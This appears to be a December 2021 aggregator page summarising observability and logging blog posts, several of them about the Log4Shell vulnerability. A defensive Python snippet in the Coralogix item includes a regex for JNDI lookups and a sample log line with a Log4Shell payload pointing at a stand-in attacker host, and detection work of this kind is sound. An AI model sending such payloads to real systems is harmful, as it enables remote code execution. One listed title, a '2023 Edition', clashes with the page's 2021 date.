
December 2021

ECS Monitoring Metrics that Help Optimize and Troubleshoot Tasks

Compute functions that run on Amazon’s Elastic Container Service (ECS) need regular monitoring to make sure containerized workloads on AWS run and are managed properly. In short, ECS monitoring is a must. ECS can manage containers on either EC2 or Fargate. Both are compute services, but EC2 lets users configure virtually every functional aspect, while Fargate offers fewer settings and is simpler to set up.

Log4J Does What?!!!

You have probably heard of Log4Shell, the security vulnerability that has ‘earned’ itself a NIST severity score of 10. In this post I will show a really basic example of how this vulnerability actually works. I will walk you through some basic usage of the Log4J library and then show how some fairly basic inputs into this library can cause truly unexpected, and potentially disastrous, outcomes.

What are AWS EC2 Instances? A Tutorial for EC2 Metrics Shipping with Logz.io

Amazon Elastic Compute Cloud (a.k.a. EC2) is no doubt the core of today's computing infrastructure. It sits at the heart of AWS as the main structure for housing virtual machines and containers for development and operations. Applying observability standards to EC2 logs and, of course, EC2 metrics (or any kind of AWS metrics, for that matter) will tell you whether you have the right sorts of instances in place (and whether those instances are the appropriate size).

Grafana Loki 2021: Year in review

This year, we were excited to deliver the easiest version of Grafana Loki to use yet. With Loki 2.4, the Loki team introduced a simple, scalable deployment, and over the past 12 months, we added lots of great new features. Not to mention, we launched Grafana Enterprise Logs, a new addition to the Grafana Enterprise Stack that’s powered by Loki. But none of this would have been possible without our active community: In 2021, Loki had 166 contributors and 823 PRs in GitHub.

How to Detect Log4Shell Events Using Coralogix

The Log4J library is one of the most widely used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J framework, known as Log4Shell, that gives attackers a simple way to run arbitrary code on any machine that uses a vulnerable version of Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.
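As a rough illustration of what detection can look like, the sketch below scans log lines for the plain `${jndi:` lookup string that Log4Shell exploit attempts commonly contain. It is not Coralogix's detection logic: the function name `find_suspicious_lines` and the sample lines are hypothetical, and obfuscated payloads (for example, nested lookups that assemble the word "jndi" piece by piece) would slip past a pattern this simple.

```python
import re

# Matches the plain, unobfuscated JNDI lookup prefix, ignoring case.
# Assumption: obfuscated variants are out of scope for this sketch.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_suspicious_lines(lines):
    """Return (line_number, line) pairs whose text contains a JNDI lookup."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if JNDI_LOOKUP.search(line)
    ]


# Hypothetical access-log lines, for illustration only.
sample = [
    "GET /index.html 200 Mozilla/5.0",
    "GET /login 200 ${jndi:ldap://attacker.example/a}",
]
hits = find_suspicious_lines(sample)
```

Here `hits` holds only the second line, paired with its line number. A real rule set would need to cover far more variants than this single pattern.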

Monitoring Office365 and Azure Health Status with Coralogix

Life is all about perspective, and the way we look at things often defines us as individuals, professionals, business entities, and products. How you understand the world is influenced by many details, or in the case of your application – many data sources. At Coralogix, we not only preach comprehensive data analysis but strive to enable it by continuously adding new ways to collect data.

Top Data Visualisation Tools (2023 Edition)

If you have been trying to compare all of the best data visualisation tools you may have found it difficult to find a detailed list that includes both open-source and proprietary solutions to help you compare and make an informed decision on what you need going forward. In this guide, you will find out everything you need to know about the leading solutions for data visualisation to help you get started with your next analysis project.

To Mask, or Not to Mask? That Is the Question

As I write this blog post, I reflect on my years as a system administrator and the task of ensuring that no sensitive data made its way past me. What a daunting task, right? The idea that sensitive data can make its way through our systems and other tools and reports is terrifying! Not to mention the potential financial and contractual problems this can cause.

Database monitoring with Sumo Logic and OpenTelemetry-powered distributed tracing

We are living in a data world. Data describes and controls almost every aspect of our lives, from presidential elections to everyday grocery shopping. Data grows exponentially, and so does the complexity of the applications that manage that data. We all know the recent shift to microservices and other revolutionary changes that happened in the way we design, develop, deploy and operate modern applications.

Log4Shell: How We Protect Sematext Users

On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code on the vulnerable server. This vulnerability was registered on the National Vulnerability Database as CVE-2021-44228, with a severity score of 10. Here is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).

How to Perform Log Analysis

Log file analysis plays a central role in enhancing the observability of your IT estate, helping operations teams and SREs to identify issues as they emerge and track down the cause of failures quickly. As the number of log entries generated on any given day in a medium-sized business easily numbers in the thousands, viewing and analyzing logs manually to realize these benefits is not a realistic option. This is where automated real-time log analysis comes in.

Simplify Your Budget Planning with Ingest-Only Pricing for LogStream Cloud

Over the last year, we’ve seen tremendous growth in both demand and usage for LogStream Cloud. It is exciting to be able to speed up time to value, reduce the total cost of ownership, and deliver LogStream to customers in a way that best fits their organizational needs. We here at Cribl have been working with our cloud customers to better understand how to optimize LogStream Cloud pricing to provide the best possible ROI.

Splunk RUM Frontend Error Monitoring is Now Generally Available!

Debugging errors is an essential component to SRE and developer workflows. “How do we prioritize and isolate JavaScript errors more effectively?” is a top challenge we hear from engineering teams looking to improve end-user experience. Therefore, we are excited to announce the general availability of Splunk RUM frontend error monitoring.

The 2022 State of Observability Report

Interest in observability is at an all-time high. When we attended KubeCon in Los Angeles in October, observability and security were everywhere (in conversations with attendees and other vendors, during sessions, and in messaging at booths), indicating that there’s still an unmet need. In fact, Gartner declared that observability is at the ‘peak of inflated expectations’ in a recent Hype Cycle report.

How to find cloud logs and manage logging costs

We covered best practices for ingesting, centralizing, and managing cloud logs in our previous episode. But how can you quickly find the logs you're looking for when troubleshooting? And how can you manage and optimize your logging costs? In this episode, we'll show you how to use advanced log queries to find the exact logs you're looking for and how to manage logging costs.

Splunk Mobile, iPad, AR and TV in Private Networks

Having Splunk Mobile available in your pocket is great, but what if you're not able to take advantage of it because of Defense Federal Acquisition Regulation Supplement (DFARS) requirements or security concerns? Through this blog post, you'll learn how deploying a Private Spacebridge might be the right answer!

Get Started with the Public Beta for Unified Dashboards

During Logz.io’s ScaleUp 2021 user conference, we announced that Unified Dashboards were coming soon. Now they are finally here for anyone to try during the Public Beta. Unified Dashboards will allow Logz.io customers to analyze and filter their logs, metrics, and traces side-by-side on a single monitoring dashboard. Check out our recent blog to learn about why we built Unified Dashboards and the value they bring to customers.

Splunk AR - What's new .conf 2021

Want to deploy Splunk AR out in the field? Splunk AR is a powerful application that allows field workers to quickly gain valuable insights from assets in your deployment. With Splunk data supporting them, field workers can take action. In addition, we’ve built a powerful admin suite to make the AR experience seamless and manageable. In this video, we talk about all the new capabilities we’ve built in 2021 for Splunk AR and how your company can take advantage of them.

Coralogix is Live in the Red Hat Marketplace!

Coralogix is excited to announce that our Stateful Streaming Data Platform is now available on the Red Hat Marketplace. Built for modern architectures and workflows, the Coralogix platform produces real-time insights and trend analysis for logs, metrics, and security with no reliance on storage or indexing, making it a perfect match for the Red Hat Marketplace.

Managing Your SIEM EPS License with Cribl LogStream

We see unfriendly customer practices all around in the SIEM space. For example, some major SIEM vendors use an Events Per Second (EPS) license model to monetize access to their tools. Typically, if you run over your EPS license, these vendors will drop the data above the limit or stop data ingestion altogether to incentivize license compliance. These license controls disrupt operations and put enterprise security posture at risk, which can cause chaos.
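To make the EPS idea concrete, here is a minimal sketch that buckets event timestamps into whole seconds and reports the seconds that exceed a limit. It does not reflect how any SIEM vendor or Cribl LogStream actually meters traffic: the function name `seconds_over_limit`, the limit value, and the timestamps are all hypothetical.

```python
from collections import Counter


def seconds_over_limit(event_timestamps, eps_limit):
    """Map each whole second to its event count when that count exceeds eps_limit.

    Assumption: timestamps are non-negative seconds (floats allowed), and a
    simple fixed one-second bucket is an acceptable approximation of EPS.
    """
    per_second = Counter(int(ts) for ts in event_timestamps)
    return {second: count for second, count in per_second.items() if count > eps_limit}


# Hypothetical event arrival times, in seconds.
timestamps = [0.1, 0.5, 0.9, 1.2, 2.0, 2.1, 2.2, 2.3]
over = seconds_over_limit(timestamps, eps_limit=3)
```

With a limit of 3, only second 2 (four events) is over the limit, so `over` is `{2: 4}`. Knowing which seconds breach the limit is the first step toward deciding what to filter or sample before the data reaches a licensed tool.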

Host and process metrics - monitoring beyond apps

Consumers and users of applications expect near 100% availability and reliability to work, transact, collaborate, etc. There’s a lot of talk about monitoring the performance of the application itself, but what about the underlying systems and components supporting the app, and in particular the infrastructure it sits on? If any piece of this stack fails, it can negatively impact the user experience, and in turn, your business.

Catching Malicious Log4j/Log4Shell Events In Real Time with LogStream

The recent Apache Log4j vulnerability CVE-2021-44228 dubbed Log4Shell is a big deal. By now there is no shortage of blogs, other write-ups, and analysis about why this vulnerability is an urgent issue and why there is a very good chance it applies to your environment. Here are some of the articles that dive into the gory details on this CVE.

Splunk Cloud Self-Service: Announcing The New Admin Config Service API For Private Applications

In our last blog, "Splunk Cloud Self-Service: Announcing the Admin Config Service (ACS)" we introduced our modern, cloud-native API that is enabling Splunk Cloud Platform admins to manage their environments in a self-service fashion. In this blog, we take a look at our latest effort to empower our customers: ACS private app management.

What is the Log4j 2 Vulnerability?

Over the last few days, there has been a tremendous number of posts about the Log4j 2 vulnerability, with Wired going so far as to claim that “the internet is on fire.” TL;DR: LogDNA is not exposed to risk from the Log4Shell vulnerability in Log4j 2 at this time. If that’s all you came for, you can stop reading here. If you want to learn more about the vulnerability and how LogDNA protects you from risks like these, grab a cup of coffee and read on.

Observing Kubernetes With LM Logs

As more and more IT organizations move towards containerized workloads and services, it is more important than ever to have insight into the containers and the services running within. Leading the container orchestration charge is Kubernetes (aka k8s, where the 8 represents the letters omitted from the middle of the word). In fact, about two-thirds of IT engineers have seen their Kubernetes adoption increase during the pandemic as the need for scaling and performance grows.

What are Linux Logs? How to View Them, Most Important Directories & More

In software, it’s essential to monitor logs of system activities. Today we’ll unravel what Linux logs are and how you can view them. Logging is a must for today’s developers, which is why Retrace was designed with a built-in, centralized log management tool.

ElasticON Global Opening Keynote: Solving for Innovation

Join co-founder and CEO Shay Banon, Chief Product Officer Ash Kulkarni, and special guest Scott Guthrie, Executive Vice President of Cloud and AI at Microsoft, to hear the latest about Elastic’s vision for the future. Speakers: Shay Banon, Founder & CEO, Elastic; Ash Kulkarni, Chief Product Officer, Elastic; Scott Guthrie, Executive Vice President of Cloud and AI, Microsoft.

Elastic Observability Keynote: Unified, Actionable, Frictionless

Elastic Observability makes it easier for organizations to store, search, and analyze any type of data, from any source, to keep systems running (and customers happy). And with our most recent release, we’ve continued to make this even faster and simpler, from automated root cause analysis to centralized agent management with Elastic Agent. Join the keynote to learn what’s on the Elastic Observability roadmap and how upcoming innovations will continue to break down barriers for users with frictionless onboarding, integrated workflows, and actionable observability with AIOps.

What is eBPF and Why is it Important for Observability?

Observability is one of the most popular topics in technology at the moment, and that isn’t showing any sign of changing soon. Agentless log collection, automated analysis, and machine learning insights are all features and tools that organizations are investigating to optimize their systems’ observability. However, there is a new kid on the block that has been gaining traction at conferences and online: the Extended Berkeley Packet Filter, or eBPF. So, what is eBPF?

Getting the Memo: Breaking Down the OMB's M-21-31

If you read my last blog post, you’re already ahead of the game. You know that in May of 2021, the Biden Administration announced Executive Order (EO) 14028: Improving the Nation’s Cybersecurity, which mandates each federal agency to adapt to today’s continuously changing threat environment. Well, folks, the saga continues.

High Five: The Latest Integrations from Splunk, Microsoft and GitHub

Hello Splunk Nation! Welcome to the latest roundup of Splunk integrations with Microsoft and GitHub! Hopefully, you had a chance to virtually attend .conf21 and check out all the amazing content. For those of you who missed it, we’re recapping the Microsoft, GitHub and Splunk highlights below.

Accelerating Cloud Monitoring via the Logz.io Azure Native Integration

Watch this webinar from Logz.io and the Azure Cloud team to learn about the Logz.io Azure Marketplace native integration. More specifically, it covers: collecting logs from Azure resources or applications in minutes with Logz.io, all within the Azure Portal; integrating Logz.io with Active Directory SSO for access control; and collecting logs through a new “pay for what you use” pricing model rather than committing to log volumes and plans upfront.

Introducing... Splunk for iPad!

Are you busy and on the go but still need to dig into your data and view your dashboards? We’ve got you covered — introducing… Splunk for iPad! Splunk for iPad is designed for and dedicated to what’s unique and great about the iPad, taking full advantage of its portable and interactive nature with unique dashboard annotation and note-taking features.

Python JSON Log Limits: What Are They and How Can You Avoid Them?

Python JSON logging has become the standard for generating readable structured data from logs. While logging in JSON is definitely much better than using the standard logging module, it comes with its own set of challenges. As your server or application grows, the number of logs also increases exponentially. It’s difficult to go through JSON log files, even if they’re structured, due to the sheer size of the logs generated.
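For readers who have not seen JSON logging in Python, the sketch below shows one common way to get it: a custom `logging.Formatter` that serializes each record with `json.dumps`. The class name `JsonFormatter`, the logger name `json_demo`, and the chosen fields are illustrative assumptions, not something the post prescribes.

```python
import io
import json
import logging


class JsonFormatter(logging.Formatter):
    """Render each log record as a single JSON object (hypothetical field set)."""

    def format(self, record):
        payload = {
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
        }
        return json.dumps(payload)


# Write to an in-memory stream so the example has no side effects on disk.
stream = io.StringIO()
handler = logging.StreamHandler(stream)
handler.setFormatter(JsonFormatter())

logger = logging.getLogger("json_demo")
logger.setLevel(logging.INFO)
logger.addHandler(handler)
logger.propagate = False  # keep the record out of the root logger's handlers

logger.info("user %s logged in", "alice")
line = stream.getvalue().strip()
```

Each call produces one JSON object per line, which is easy for machines to parse but, as the post notes, still adds up quickly as volume grows.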

Are You Ready to (Executive) Order?

We’ve all been there. That harrowing moment at the restaurant when the waiter comes to the table and asks that fateful question: “Are you ready to order?” I don’t know about you, but I am almost never ready. Do I want chicken or steak? I’ve eaten a lot of meat this week… Should I opt for fish or a vegetarian option instead? Oh, God. I forgot to check the reviews online. What do other people like the best? Cue heart palpitations.

Why Data Maturity Matters | Prof. Sally Eaves, Ronald van Loon and Splunk's Mark Woods

In today’s world, data is a strategic asset helping organisations not just survive but thrive. Our current era of innovation is propelled by those who are doing more than just storing and managing data. Splunk’s latest State of Data Innovation report revealed that organisations that invested in placing data at the core of their operations were twice as innovative and productive as those that didn’t. Prof. Sally Eaves, Ronald van Loon and Splunk's own Mark Woods discuss how organisations not only need a complete view of their data but the ability to act upon their data quickly.

Performance Testing Tools: 8 to Help Find Your Bottlenecks

Performance is a vital component of user experience. Users will leave—and likely not come back—if your site is slow. If they stay, they’ll be less likely to buy from you if their experience is subpar. To add insult to injury, they’re even less likely to find your app to begin with, since Google punishes poorly-performing sites in the search results. To solve the problem of poor performance, knowledge of what impacts performance is essential.

New feature in Loki 2.4: no more ordering constraint

A new version of Loki was released back in November, and I’m here to talk about one of its most exciting features. Loki 2.4 finally removed the requirement that all data must be ingested in timestamp-ascending order. Instead, Loki now allows out of order logs up to a configurable validity window (more to come on that). In this post, I’ll walk through what all this means and why we’re thrilled about it.
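The idea of a validity window can be sketched in a few lines. The code below is a conceptual illustration only, not Loki's implementation or configuration: the class `StreamWindow` and its `window_seconds` parameter are hypothetical. An entry is accepted if it is no older than the window behind the newest entry accepted so far.

```python
class StreamWindow:
    """Accept entries at most `window_seconds` older than the newest accepted one.

    Assumption: timestamps are plain numbers in seconds; a real system
    tracks this per stream and derives the window from its configuration.
    """

    def __init__(self, window_seconds):
        self.window_seconds = window_seconds
        self.newest = None  # newest timestamp accepted so far

    def accept(self, timestamp):
        # Reject entries that fall behind the validity window.
        if self.newest is not None and timestamp < self.newest - self.window_seconds:
            return False
        # Advance the high-water mark only when the entry is newer.
        if self.newest is None or timestamp > self.newest:
            self.newest = timestamp
        return True


window = StreamWindow(window_seconds=60)
results = [window.accept(ts) for ts in (1000, 970, 900, 1100, 1000)]
```

In this run the entries at 1000 and 970 are accepted, 900 is rejected as too old, 1100 moves the window forward, and the second 1000 is then rejected because it falls more than 60 seconds behind 1100.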

An Introduction to Log Analysis

If you think log files are only necessary for satisfying audit and compliance requirements, or to help software engineers debug issues during development, you’re certainly not alone. Although log files may not sound like the most engaging or valuable assets, for many organizations, they are an untapped reservoir of insights that can offer significant benefits to your business.

Live from AWS re:Invent - Time Travel with Splunk and AWS

Presenters: Jon LeBaugh and Robert Gustafson. Time travel is possible! Well, at least for data in Splunk. Learn how and why we use AWS Lambda, Splunk SmartStore, and Amazon S3 to move data into the future in this behind-the-scenes look at Splunk’s Boss of Ops and O11y capture-the-flag competition.

Live from AWS re:Invent - Metrics and Logs Sitting in a Tree, Lowering your MTT*s

We all know by now that the exponential increase in cloud complexity has required a shift in traditional monitoring. These major changes lead to major challenges. In most environments, it is becoming more and more difficult to predict outages and determine root cause. There is a need for both real-time monitoring and alerting as well as a way to flexibly dig into your data to determine true root cause. Introducing the hottest new couple: metrics and logs. Come see how this duo can help speed up cloud adoption, future-proof your cloud monitoring, and lower MTTD and MTTR.

Five things everyone needs to know about their AWS environment that they can't see from CloudWatch

At Splunk we love AWS, and we love all things CloudWatch... it's a great source of data to collect and correlate. Sometimes we get asked "Why do I need Splunk when I have CloudWatch dashboards?" What a great question! Join this session to learn about five critical insights about your AWS environment that you'll never get using CloudWatch alone. Behold the power of Splunk's search and analysis platform!

Splunk Mobile for Private Networks

Are you working in a secure environment and want to take advantage of Splunk Mobile and Connected Experiences? Welcome to Private Spacebridge, a version of Spacebridge that you can deploy and manage in your own Kubernetes cluster. Check out this video where Joe, our SR Spacebridge engineer, explains what Private Spacebridge is all about and how it works to get you securely routing mobile traffic through your environment.

Best Practices for Cloud Logging

In our last episode, we covered how to best deploy and use Cloud Monitoring. This week, we answer the most important questions about Cloud Logging - what’s the best way to ingest logs? And how do you centralize logs and manage access? Watch this episode of Engineering for Reliability to learn some best practices for using Cloud Logging. Watch to learn how to keep your services reliable and your users happy.

DevOps State of Mind Podcast Episode 3: DevRel and DevOps, Two Peas in a Pod

Joe Karlsson is a senior developer advocate at SingleStore. SingleStore has a highly scalable SQL database that delivers maximum performance for transactional and analytical workloads, all with familiar relational data structures. Joe collaborates with teams across the company to amplify developers' voices and provide support for multiple audiences. Today, we're going to talk about cross-team empathy and why DevRel and DevOps work hand in hand.

Solution Brief: Increase Data Visibility and Accelerate Attack Resolution with Exabeam and Cribl LogStream

Traditional security tools struggle to adapt to the new world of cyber threats. To keep up with the growing number of daily threats, understaffed security teams need new cloud-delivered solutions and tactics focused on generating attack resolutions, consistently and repeatedly. Enter Exabeam. Exabeam powers security teams with analytics-driven insights to uncover, investigate, and resolve threats legacy tools may miss.